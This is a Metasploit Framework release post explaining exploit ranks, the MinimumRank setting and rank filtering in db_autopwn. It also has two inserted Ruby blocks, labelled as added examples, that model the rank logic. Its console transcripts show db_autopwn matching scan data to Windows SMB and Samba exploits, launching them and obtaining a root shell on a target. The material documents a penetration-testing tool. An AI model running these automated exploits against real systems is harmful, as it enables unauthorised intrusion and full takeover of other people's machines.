Last updated at Mon, 05 Feb 2024 21:05:55 GMT

This morning we released version 3.3.3 of the Metasploit Framework. This release focuses on exploit rankings, session automation, and bug fixes. An exploit's rank indicates how reliable the exploit is and how likely it is to have a negative impact on the target system. The rank can be used to prevent exploits below a given level from being run at all, and so to limit the impact on a particular target.

The most basic use of ranking is the search command, which now accepts the "-r" parameter; its argument is the minimum rank to show. Valid ranks, from highest to lowest, are excellent, great, good, normal, average, low, and manual. The exploit rankings page goes into greater detail on what these levels actually mean. The following command shows all modules ranked "great" or better:

msf> search -r great

From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:

msf> setg MinimumRank excellent
msf> use exploit/windows/smb/ms08_067_netapi
msf (exploit/ms08_067_netapi) > exploit

[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).
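The ordering behind `search -r` and the MinimumRank check, modelled as an added example (this is not Metasploit Framework code). The rank names come from the post; the numeric values assigned to them are an assumption chosen only so that better ranks compare greater, and the ranks given to the sample modules are illustrative rather than the modules' real rankings.

```ruby
# Added example, not Metasploit Framework code: a model of how the exploit-rank
# ordering gates module use, as described in the post.
#
# Rank names are from the post; the numeric values are assumed here so that
# "better" ranks compare greater.
RANKS = {
  'manual'    => 0,
  'low'       => 100,
  'average'   => 200,
  'normal'    => 300,
  'good'      => 400,
  'great'     => 500,
  'excellent' => 600,
}.freeze

# Resolve a rank name to its numeric value, rejecting names the post does not list.
def rank_value(name)
  RANKS.fetch(name.to_s.downcase) { raise ArgumentError, "unknown rank: #{name.inspect}" }
end

# Equivalent of `search -r <min>`: keep modules ranked at or above the minimum.
# `modules` is an Array of { name:, rank: } hashes.
def search_by_rank(modules, min_rank)
  floor = rank_value(min_rank)
  modules.select { |m| rank_value(m[:rank]) >= floor }
end

# Equivalent of the MinimumRank check performed before `exploit`: returns
# [true, nil] when the run is allowed, or [false, message] when it is refused.
# `force: true` models `exploit -f`, which bypasses the check.
def check_minimum_rank(module_rank, min_rank, force: false)
  return [true, nil] if force || rank_value(module_rank) >= rank_value(min_rank)

  msg = "This exploit is below the minimum rank, '#{min_rank}'. " \
        "Run with -f or lower MinimumRank ('manual' is the lowest)."
  [false, msg]
end

# Constructed sample module list. Module names appear in the post's output;
# the ranks assigned here are illustrative, not the modules' actual rankings.
SAMPLE_MODULES = [
  { name: 'exploit/windows/smb/ms08_067_netapi',  rank: 'great' },
  { name: 'exploit/windows/smb/psexec',            rank: 'excellent' },
  { name: 'exploit/osx/samba/lsa_transnames_heap', rank: 'average' },
  { name: 'exploit/windows/dcerpc/ms03_026_dcom',  rank: 'good' },
].freeze

if __FILE__ == $PROGRAM_NAME
  puts 'search -r great:'
  search_by_rank(SAMPLE_MODULES, 'great').each { |m| puts "  #{m[:name]} (#{m[:rank]})" }

  # With MinimumRank set to excellent, a 'great' module is refused unless forced.
  ok, msg = check_minimum_rank('great', 'excellent')
  puts(ok ? 'allowed' : "[-] #{msg}")
end
```

The check compares numeric values rather than strings, so a misspelt rank name fails loudly instead of silently allowing or blocking a run; the force flag is the only way past the floor, mirroring `exploit -f`.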

The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. In both the Metasploit Framework NeXpose plugin and the db_autopwn command, the "-R" parameter specifies the minimum rank. This instructs the exploit matching algorithm to run only exploits with that rank or better, which not only speeds up the exploit process but also reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to target only vulnerabilities for which the exploit is ranked excellent:

msf exploit(psexec) > db_autopwn -b -x -t
[*]   XX.YY.44.223:1220  exploit/unix/webapp/qtss_parse_xml_exec  (CVE-2003-0050, BID-6954)
[*]   XX.YY.41.188:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.77.234:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.47.203:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.37.182:139  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.32.2:445  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.35.195:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.32.2:139  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.44.223:139  exploit/solaris/samba/trans2open  (CVE-2003-0201, BID-7294)
[*]   XX.YY.44.223:139  exploit/multi/samba/nttrans  (CVE-2003-0085, BID-7106)
[*]   XX.YY.47.203:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.47.203:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*]   XX.YY.72.243:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.72.243:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*]   XX.YY.37.182:445  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.34.236:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.41.188:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.41.188:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*]   XX.YY.44.223:1220  exploit/unix/webapp/qtss_parse_xml_exec  (CVE-2003-0050, BID-6954)
[*]   XX.YY.77.234:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.35.195:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions
Active sessions
===============
  Id Description Tunnel Via
  --  -----------  ------  ---
  1   Command shell  192.168.198.128:45146 -> XX.YY.44.223:32554  unix/webapp/qtss_parse_xml_exec
msf exploit(psexec) > sessions -i 1 
[*] Starting interaction with 1...
uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC  Power Macintosh powerpc
id
uid=0(root) gid=0(wheel) groups=0(wheel)
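The matching-and-filtering step behind the `db_autopwn -x -t` and `-R excellent` listings above, as an added example that is not Metasploit Framework code. It models vulnerability-to-module matching by shared references and then applies the minimum-rank floor. Module names and references are taken from the post's output; the ranks assigned to the modules, the numeric rank ordering, and the constructed scan records (with the post's XX.YY placeholder addresses) are assumptions for illustration.

```ruby
# Added example, not Metasploit Framework code: a simplified model of the
# db_autopwn matching step described in the post. Imported vulnerabilities are
# matched to exploit modules by shared references (-x), then the -R minimum rank
# drops any module ranked below it. Rank names are from the post; the numeric
# ordering is assumed.
RANKS = { 'manual' => 0, 'low' => 100, 'average' => 200, 'normal' => 300,
          'good' => 400, 'great' => 500, 'excellent' => 600 }.freeze

# Constructed module catalogue. Names and references appear in the post's
# output; the ranks assigned here are illustrative, not the real rankings.
MODULES = [
  { name: 'exploit/unix/webapp/qtss_parse_xml_exec', rank: 'excellent',
    refs: ['CVE-2003-0050', 'BID-6954'] },
  { name: 'exploit/windows/smb/ms08_067_netapi', rank: 'great',
    refs: ['NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos'] },
  { name: 'exploit/windows/smb/psexec', rank: 'excellent',
    refs: ['CVE-1999-0504'] },
  { name: 'exploit/osx/samba/lsa_transnames_heap', rank: 'average',
    refs: ['CVE-2007-2446', 'OSVDB-34699'] },
].freeze

# Constructed scan import: one record per host/port with the references the
# scanner reported. Addresses are placeholders, as in the post.
VULNS = [
  { host: 'XX.YY.44.223', port: 1220, refs: ['CVE-2003-0050'] },
  { host: 'XX.YY.41.188', port: 445,  refs: ['NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos'] },
  { host: 'XX.YY.77.234', port: 445,  refs: ['CVE-1999-0504'] },
  { host: 'XX.YY.37.182', port: 139,  refs: ['CVE-2007-2446'] },
].freeze

# Return [vuln, module] pairs whose reference lists intersect, keeping only
# modules at or above min_rank when one is given (the -R floor). With no
# floor, every matching module is listed, as in the first -t run above.
def match_exploits(vulns, modules, min_rank: nil)
  floor = min_rank ? RANKS.fetch(min_rank) : 0
  vulns.flat_map do |v|
    modules
      .select { |m| RANKS.fetch(m[:rank]) >= floor && (m[:refs] & v[:refs]).any? }
      .map { |m| [v, m] }
  end
end

# Render one match in the same shape as the post's "-t" listing.
def format_match(vuln, mod)
  "[*]   #{vuln[:host]}:#{vuln[:port]}  #{mod[:name]}  (#{mod[:refs].join(', ')})"
end

if __FILE__ == $PROGRAM_NAME
  puts 'db_autopwn -x -t'
  match_exploits(VULNS, MODULES).each { |v, m| puts format_match(v, m) }

  puts 'db_autopwn -x -t -R excellent'
  match_exploits(VULNS, MODULES, min_rank: 'excellent').each { |v, m| puts format_match(v, m) }
end
```

Raising the floor shrinks the candidate list before anything is launched, which is where the crash-risk reduction the post describes comes from: modules whose reliability is unknown or poor never reach the launch stage at all.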